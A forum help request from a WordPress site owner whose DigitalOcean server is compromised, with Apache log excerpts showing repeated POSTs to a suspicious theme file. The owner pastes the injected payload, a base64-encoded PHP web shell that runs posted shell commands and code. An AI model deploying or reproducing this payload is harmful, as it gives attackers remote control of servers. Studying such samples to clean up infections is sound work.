Question
DigitalOcean Wordpress instance getting attacked
Hey,
I’ve got a wordpress instance setup from the one-click digital ocean installer. It runs fine most of the time but I keep getting attacked, causing the site to go down.
I have already setup JetPack as described in this article to prevent rpc attacks, but I still seem to be getting screwed.
This keeps getting injected into my php files (wp-config.php, index.php, wp-settings.php, etc)
eval(base64_decode("JGFyclswXT0iQ2lSaGRYUm9JRDBnSW1ZeU1HUTJOVFEyTTJZeFpqVmlaalJrTldRNE56VXlPR0UxWlRJd01EUm1JanNLSkhWeWJDQTlJQ0pvZEhSd09pOHZJaTRrWDFORlVsWkZVbHNuU0ZSVVVGOUlUMU5VSjEwdUpGOVRSVkpXUlZKYkoxSkZVVlZGVTFSZlZWSkpKMTA3Q2dwbWRXNWpkR2x2YmlCa2FYTndiR0Y1WDJGMWRBPT0iOyRhcnJbMV09ImFGOW1iM0p0S0NrZ2V3b2dJQ0FnWjJ4dlltRnNJQ1IxY213N0NpQWdJQ0EvUGdvZ0lDQWdQR1p2Y20wZ1lXTjBhVzl1UFNJOFAzQm9jQ0JsWTJodklDUjFjbXdnUHo0aUlHMWxkR2h2WkQwaWNHOXpkQ0krQ2lBZ0lDQWdJQ0FnUEdsdWNIVjBJSFI1Y0dVOUluQmhjM04zYjNKa0lpQnBaRDBpY0hka0lpQnVZUT09IjskYXJyWzJdPSJiV1U5SW5CM1pDSStDaUFnSUNBZ0lDQWdQR2x1Y0hWMElIUjVjR1U5SW1ocFpHUmxiaUlnYVdROUltUnZYMkYxZEdnaUlHNWhiV1U5SW1SdlgyRjFkR2dpUGdvZ0lDQWdJQ0FnSUR4cGJuQjFkQ0IwZVhCbFBTSnpkV0p0YVhRaVBnb2dJQ0FnUEM5bWIzSnRQZ284UDNCb2NBcDlDZ3BtZFc1amRHbHZiaUJoZFE9PSI7JGFyclszXT0iZEdnb0tTQjdDaUFnSUNCbmJHOWlZV3dnSkdGMWRHZzdDaUFnSUNCcFppQW9LQ0ZwYzNObGRDZ2tYME5QVDB0SlJWc25ZWFYwYUNkZEtTa2dKaVlnS0NGcGMzTmxkQ2drWDFCUFUxUmJKMlJ2WDJGMWRHZ25YU2twS1NCN0NpQWdJQ0FnSUNBZ1pHbHpjR3hoZVY5aGRYUm9YMlp2Y20wb0tUc0tJQ0FnSUNBZ0lBPT0iOyRhcnJbNF09IklHUnBaU2dwT3dvZ0lDQWdmUW9nSUNBZ2FXWWdLR2x6YzJWMEtDUmZVRTlUVkZzblpHOWZZWFYwYUNkZEtTa2dld29nSUNBZ0lDQWdJR2xtSUNocGMzTmxkQ2drWDFCUFUxUmJKM0IzWkNkZEtTa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9iV1ExS0NSZlVFOVRWRnNuY0hka0oxMHBQVDA5SkdGMWRHZ3BJQT09IjskYXJyWzVdPSJld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjMlYwWTI5dmEybGxLQ0poZFhSb0lpeHRaRFVvSkY5UVQxTlVXeWR3ZDJRblhTa3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlIUnlkV1U3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMGdaV3h6WlNCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCa2FYTndiR0Y1WHc9PSI7JGFycls2XT0iWVhWMGFGOW1iM0p0S0NrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCa2FXVW9LVHNLSUNBZ0lDQWdJQ0FnSUNBZ2ZRb0tJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdaR2x6Y0d4aGVWOWhkWFJvWDJadmNtMG9LVHNLSUNBZ0lDQWdJQ0JrYVdVb0tUc0tJQ0FnSUgwS0NpQWdJQ0JwWmlBb2FYTnpaWFFvSkY5RFR3PT0iOyRhcnJbN109IlQwdEpSVnNuWVhWMGFDZGRLU2tLSUNBZ0lDQWdJQ0JwWmlBb0pGOURUMDlMU1VWYkoyRjFkR2duWFQwOVBTUmhkWFJvS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJSEpsZEhWeWJpQjBjblZsT3dvZ0lDQWdJQ0FnSUgwZ1pXeHpaU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lHUnBjM0JzWVhsZllYVjBhRjltYjNKdEtDazdDZz09IjskYXJyWzhdPSJJQ0FnSUNBZ0lDQWdJQ0FnWkdsbEtDazdDaUFnSUNBZ0lDQWdmUXA5Q2dwbWRXNWpkR2x2YmlCa2FYTndiR0Y1WDJsdWRHVnlabUZqWlNncElIc0tJQ0FnSUdkc2IySmhiQ0FrZFhKc093b2dJQ0FnUHo0S0lDQWdJRHhvZEcxc1Bnb2dJQ0FnUEhScGRHeGxQancvY0dod0lHVmphRzhnSkY5VFJWSldSVkpiSnc9PSI7JGFycls5XT0iU0ZSVVVGOUlUMU5VSjEwN0lEOCtQQzkwYVhSc1pUNEtJQ0FnSUR4emRIbHNaVDRLSUNBZ0lDQWdJQ0FqZDJsdVpHOTNjaUI3Q2lBZ0lDQWdJQ0FnSUNBZ0lHWnZiblF0YzJsNlpUb2dNVE53ZURzS0lDQWdJQ0FnSUNBZ0lDQWdZMjlzYjNJNkl6QXdabVl3TURzS0lDQWdJQ0FnSUNBZ0lDQWdZbTl5WkdWeU9nPT0iOyRhcnJbMTBdPSJNbkI0SUhOdmJHbGtJQ013TUdFd01EQTdDaUFnSUNBZ0lDQWdJQ0FnSUhkcFpIUm9Pamd3TUhCNE95Qm9aV2xuYUhRNk5UQndlRHNLSUNBZ0lDQWdJQ0FnSUNBZ1ltRmphMmR5YjNWdVpEb2dJekF3TURBd01Ec0tJQ0FnSUNBZ0lDQWdJQ0FnY0dGa1pHbHVaeTFzWldaME9qRXdjSGc3Q2lBZ0lDQWdJQ0FnZlE9PSI7JGFyclsxMV09IkNpQWdJQ0FnSUNBZ0kyTnRaQ0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lHSmhZMnRuY205MWJtUTZJQ015UmpKR01rWTdDaUFnSUNBZ0lDQWdJQ0FnSUdOdmJHOXlPaU13TUdabU1EQTdDaUFnSUNBZ0lDQWdmUW9nSUNBZ1BDOXpkSGxzWlQ0S0lDQWdJRHh6WTNKcGNIUStDZ29nSUNBZ0lDQWdJR1oxYm1OMGFXOXVJQT09IjskYXJyWzEyXT0iYkc5bmIzVjBLQ2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmtiMk4xYldWdWRDNWpiMjlyYVdVOUltRjFkR2c5TVRzaU93b2dJQ0FnSUNBZ0lDQWdJQ0IzYVc1a2IzY3ViRzlqWVhScGIyNDlKencvY0dod0lHVmphRzhnSkhWeWJEc2dQejRuT3dvZ0lDQWdJQ0FnSUgwS0NpQWdJQ0FnSUNBZ1puVnVZM1JwYjI0Z1lRPT0iOyRhcnJbMTNdPSJhbUY0UTJGc2JHSmhZMnNvZEhoMEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUhaaGNpQjNhVzVrYjNkeUlEMGdaRzlqZFcxbGJuUXVaMlYwUld4bGJXVnVkRUo1U1dRb0ozZHBibVJ2ZDNJbktUc0tJQ0FnSUNBZ0lDQWdJQ0FnZDJsdVpHOTNjaTUyWVd4MVpUMTNhVzVrYjNkeUxuWmhiSFZsSzNSNGRDc25YRzRuT3c9PSI7JGFyclsxNF09IkNpQWdJQ0FnSUNBZ0lDQWdJSGRwYm1SdmQzSXVjMk55YjJ4c1ZHOXdJRDBnZDJsdVpHOTNjaTV6WTNKdmJHeElaV2xuYUhRN0NpQWdJQ0FnSUNBZ0lDQWdJSFpoY2lCamJXUWdQU0JrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwUW5sSlpDZ25ZMjFrSnlrN0NpQWdJQ0FnSUNBZ0lDQWdJR050WkM1MllXeDFaUT09IjskYXJyWzE1XT0iUFNjbk93b2dJQ0FnSUNBZ0lIMEtDaUFnSUNBZ0lDQWdablZ1WTNScGIyNGdZMkZzYkVGcVlYZ29kWEpzTEhCdmMzUmtZWFJoS1hzS0lDQWdJQ0FnSUNBZ0lDQWdMeTkyWVhJZ1ltOWtlU0E5SUdWdVkyOWtaVlZTU1VOdmJYQnZibVZ1ZENod2IzTjBaR0YwWVNrN0NpQWdJQ0FnSUNBZ0lDQWdJQzh2WVd4bGNnPT0iOyRhcnJbMTZdPSJkQ2h3YjNOMFpHRjBZU2s3SUhKbGRIVnlianNLSUNBZ0lDQWdJQ0FnSUNBZ2RtRnlJSGh0YkdoMGRIQTdDZ29nSUNBZ0lDQWdJQ0FnSUNCNGJXeG9kSFJ3SUQwZ2JtVjNJRmhOVEVoMGRIQlNaWEYxWlhOMEtDazdDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YjI1eVpXRmtlWE4wWVhSbFkyaGhibWRsSUE9PSI7JGFyclsxN109IlBTQm1kVzVqZEdsdmJpZ3Bld29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1lnS0hodGJHaDBkSEF1Y21WaFpIbFRkR0YwWlNBOVBTQTBJQ1ltSUhodGJHaDBkSEF1YzNSaGRIVnpJRDA5SURJd01DbDdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWVdwaGVFTmhiR3hpWVdOcktIaHRiR2gwZEhBdWNtVnpjQT09IjskYXJyWzE4XT0iYjI1elpWUmxlSFFwT3dvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnZlFvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YjNCbGJpZ2lVRTlUVkNJc0lIVnliQ3dnZEhKMVpTazdDaUFnSUNBZ0lDQWdJQ0FnSUhodGJHaDBkSEF1YzJWMFVtVnhkV1Z6ZEVobFlXUmxjaWduUTI5dWRBPT0iOyRhcnJbMTldPSJaVzUwTFZSNWNHVW5MQ0FuWVhCd2JHbGpZWFJwYjI0dmVDMTNkM2N0Wm05eWJTMTFjbXhsYm1OdlpHVmtKeWs3Q2lBZ0lDQWdJQ0FnSUNBZ0lIaHRiR2gwZEhBdWMyVnVaQ2h3YjNOMFpHRjBZU2s3Q2lBZ0lDQWdJQ0FnZlFvS0lDQWdJQ0FnSUNCbWRXNWpkR2x2YmlCb1lXNWtiR1ZGYm5SbGNpaHZMR1VwSUE9PSI7JGFyclsyMF09ImV3b2dJQ0FnSUNBZ0lDQWdJQ0JwWmlBb1pTNXJaWGxEYjJSbElEMDlJREV6S1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCMllYSWdZMjFrSUQwZ1pHOWpkVzFsYm5RdVoyVjBSV3hsYldWdWRFSjVTV1FvSjJOdFpDY3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdkbUZ5SUhkcGJtUnZkM0lnUFNCa2IyTjFiUT09IjskYXJyWzIxXT0iWlc1MExtZGxkRVZzWlcxbGJuUkNlVWxrS0NkM2FXNWtiM2R5SnlrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCM2FXNWtiM2R5TG5aaGJIVmxQWGRwYm1SdmQzSXVkbUZzZFdVckoxeHVKQ0FuSzJOdFpDNTJZV3gxWlNzblhHNG5Pd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZMkZzYkVGcVlYZ29KencvY0dod0lBPT0iOyRhcnJbMjJdPSJaV05vYnlBa2RYSnNPeUEvUGljc0oyRmpkR2x2YmoxamJXUW1ZMjFrUFNjclpXNWpiMlJsVlZKSlEyOXRjRzl1Wlc1MEtHTnRaQzUyWVd4MVpTa3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlHWmhiSE5sT3dvZ0lDQWdJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdmUW9LQ2lBZ0lDQThMM05qY2c9PSI7JGFyclsyM109ImFYQjBQZ29nSUNBZ1BHSnZaSGtnYzNSNWJHVTlJbUpoWTJ0bmNtOTFibVE2SUNNd01EQTdJajRLSUNBZ0lEeDBZV0pzWlNCM2FXUjBhRDBpTVRBd0pTSWdZbTl5WkdWeVBTSXdJaUJ6ZEhsc1pUMGlZbUZqYTJkeWIzVnVaRG9nSXpBd01Ec2dZMjlzYjNJNklDTXdaakE3SWo0S0lDQWdJQ0FnSUNBOGRISWdkdz09IjskYXJyWzI0XT0iYVdSMGFEMGlNVEF3SlNJK0NpQWdJQ0FnSUNBZ0lDQWdJRHgwWkNCM2FXUjBhRDBpTVRBd0pTSStDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQThZMlZ1ZEdWeVBnb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRHhwYm5CMWRDQjBlWEJsUFNKMFpYaDBJaUJwWkQwaVkyMWtJaUJ1WVcxbFBTSmpiV1FpSUhOMGVRPT0iOyRhcnJbMjVdPSJiR1U5SW5kcFpIUm9PaUE0TURCd2VEc2lJRzl1YTJWNVpHOTNiajBpYW1GMllYTmpjbWx3ZERwb1lXNWtiR1ZGYm5SbGNpaDBhR2x6TEdWMlpXNTBLVHNpUGdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnUEM5alpXNTBaWEkrQ2lBZ0lDQWdJQ0FnSUNBZ0lEd3ZkR1ErQ2lBZ0lDQWdJQ0FnUEM5MGNqNEtJQ0FnSUE9PSI7JGFyclsyNl09IklDQWdJRHgwY2lCM2FXUjBhRDBpTVRBd0pTSStDaUFnSUNBZ0lDQWdJQ0FnSUR4MFpDQjNhV1IwYUQwaU1UQXdKU0krQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0E4WTJWdWRHVnlQZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUR4MFpYaDBZWEpsWVNCcFpEMGlkMmx1Wkc5M2NpSWdibUZ0WlQwaWQybHVaQT09IjskYXJyWzI3XT0iYjNkeUlpQnpkSGxzWlQwaWQybGtkR2c2SURnd01IQjRPeUJvWldsbmFIUTZJRGd3TUhCNE95SStQQzkwWlhoMFlYSmxZVDRLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRHd2WTJWdWRHVnlQZ29nSUNBZ0lDQWdJQ0FnSUNBOEwzUmtQZ29nSUNBZ0lDQWdJRHd2ZEhJK0NpQWdJQ0FnSUNBZ1BIUnlQangwWkQ0OFl3PT0iOyRhcnJbMjhdPSJaVzUwWlhJK1BHRWdhSEpsWmowaUl5SWdiMjVqYkdsamF6MGlhbUYyWVhOamNtbHdkRG9nYkc5bmIzVjBLQ2s3SWo1bGVHbDBQQzloUGp3dlkyVnVkR1Z5UGp3dmRHUStQQzkwY2o0S0lDQWdJRHd2ZEdGaWJHVStDaUFnSUNBOEwySnZaSGsrQ2lBZ0lDQThMMmgwYld3K0Nqdy9jR2h3Q24wS0NtWjFibU4wYVE9PSI7JGFyclsyOV09ImIyNGdhR0Z1Wkd4bFgyTnRaQ2dwSUhzS0lDQWdJSE41YzNSbGJTZ2tYMUJQVTFSYkoyTnRaQ2RkTGlJZ01qNG1NU0lwT3dwOUNncG1kVzVqZEdsdmJpQm9ZVzVrYkdWZlltOTBYMk50WkNncElIc0tJQ0FnSUdsbUlDaHBjM05sZENna1gxQlBVMVJiSjJOdFpDZGRLU2tLSUNBZ0lDQWdJQ0J6ZDJsMFkyZ29KQT09IjskYXJyWzMwXT0iWDFCUFUxUmJKMk50WkNkZEtTQjdDaUFnSUNBZ0lDQWdJQ0FnSUdOaGMyVWdKMk52WkdVbk9nb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1JmWTI5a1pTZ3BPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ0lDQWdJR05oYzJVZ0ozTm9aV3hzSnpvS0lBPT0iOyRhcnJbMzFdPSJJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1JmYzJobGJHd29LVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJR0p5WldGck93b2dJQ0FnSUNBZ0lDQWdJQ0JrWldaaGRXeDBPZ29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ2ZRcDlDZ3BtZFc1amRHbHZiaUJvWVE9PSI7JGFyclszMl09ImJtUnNaVjlpYjNSZlkyMWtYM05vWld4c0tDa2dld29nSUNBZ2IySmZjM1JoY25Rb0tUc0tJQ0FnSUhONWMzUmxiU2hpWVhObE5qUmZaR1ZqYjJSbEtDUmZVRTlUVkZzbllYSm5KMTBwS1RzS0lDQWdJQ1J5UFc5aVgyZGxkRjlqYkdWaGJpZ3BPd29nSUNBZ2NISnBiblFnSkhJN0NuMEtDbVoxYm1OMGFXOXVJQT09IjskYXJyWzMzXT0iYUdGdVpHeGxYMkp2ZEY5amJXUmZZMjlrWlNncElIc0tJQ0FnSUc5aVgzTjBZWEowS0NrN0NpQWdJQ0JsZG1Gc0tHSmhjMlUyTkY5a1pXTnZaR1VvSkY5UVQxTlVXeWRoY21jblhTa3BPd29nSUNBZ0pISTliMkpmWjJWMFgyTnNaV0Z1S0NrN0NpQWdJQ0J3Y21sdWRDQWtjanNLZlFvS1puVnVZM1JwYjI0Z2JBPT0iOyRhcnJbMzRdPSJiMmR2ZFhRb0tTQjdDaUFnSUNCbmJHOWlZV3dnSkhWeWJEc0tJQ0FnSUhObGRHTnZiMnRwWlNnaVlYVjBhQ0lzSWpFaUtUc0tJQ0FnSUhCeWFXNTBJQ0k4YzJOeWFYQjBQbmRwYm1SdmR5NXNiMk5oZEdsdmJqMG5JaTRrZFhKc0xpSW5Pend2YzJOeWFYQjBQaUk3Q2lBZ0lDQmthV1VvS1RzS2ZRb0tDZ3BoZFE9PSI7JGFyclszNV09ImRHZ29LVHNLYVdZZ0tDRnBjM05sZENna1gxQlBVMVJiSjJGamRHbHZiaWRkS1NrS0lDQWdJR1JwYzNCc1lYbGZhVzUwWlhKbVlXTmxLQ2s3Q2dwcFppQW9hWE56WlhRb0pGOVFUMU5VV3lkaFkzUnBiMjRuWFNrcENpQWdJQ0J6ZDJsMFkyZ2dLQ1JmVUU5VFZGc25ZV04wYVc5dUoxMHBJSHNLSUNBZ0lDQWdJQT09IjskYXJyWzM2XT0iSUdOaGMyVWdKMk50WkNjNkNpQWdJQ0FnSUNBZ0lDQWdJR2hoYm1Sc1pWOWpiV1FvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0FnSUNBZ1kyRnpaU0FuWW05MFkyMWtKem9LSUNBZ0lDQWdJQ0FnSUNBZ2FHRnVaR3hsWDJKdmRGOWpiV1FvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdZbkpsWVdzN0NnPT0iOyRhcnJbMzddPSJJQ0FnSUNBZ0lDQmpZWE5sSUNkc2IyZHZkWFFuT2dvZ0lDQWdJQ0FnSUNBZ0lDQnNiMmR2ZFhRb0tUc0tJQ0FnSUNBZ0lDQWdJQ0FnWW5KbFlXczdDaUFnSUNBZ0lDQWdaR1ZtWVhWc2REb0tJQ0FnSUNBZ0lDQWdJQ0FnY21WMGRYSnVPd29nSUNBZ2ZRPT0iOyRzdHI9IiI7Zm9yICgkaT0wOyAkaTxjb3VudCgkYXJyKTsgJGkrKykgeyRzdHIuPWJhc2U2NF9kZWNvZGUoJGFyclskaV0pO31ldmFsKCRzdHIpOw=="));
I believe RPC is working as when I check attacks they are all just JetPack. Ther results from (grep xmlrpc /var/log/apache2/access.log) is:
108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"
There are some fishy lookin POSTs in my apache logs, but not sure if related:
162.158.59.140 - - [13/Feb/2017:14:03:36 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:04:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:05:34 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:05:37 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:06:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:06:21 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:06:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.59.128 - - [13/Feb/2017:14:06:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
162.158.58.211 - - [13/Feb/2017:14:06:56 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:07:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:07:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:08:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:08:20 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:22 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:27 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
60.241.236.163 - - [13/Feb/2017:14:08:29 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:38 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:08:56 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:09:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:09:55 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:11:23 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:12:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:12:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:13:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.134 - - [13/Feb/2017:14:13:33 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
108.162.222.164 - - [13/Feb/2017:14:13:42 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:14:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:14:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:15:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.68 - - [13/Feb/2017:14:15:49 -0500] "GET /wp-login.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.69.31 - - [13/Feb/2017:14:16:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:16:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.245.38 - - [13/Feb/2017:14:17:03 -0500] "GET /nate?_escaped_fragment_= HTTP/1.1" 500 206 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
162.158.69.31 - - [13/Feb/2017:14:17:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:17:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:17:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.69.31 - - [13/Feb/2017:14:18:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
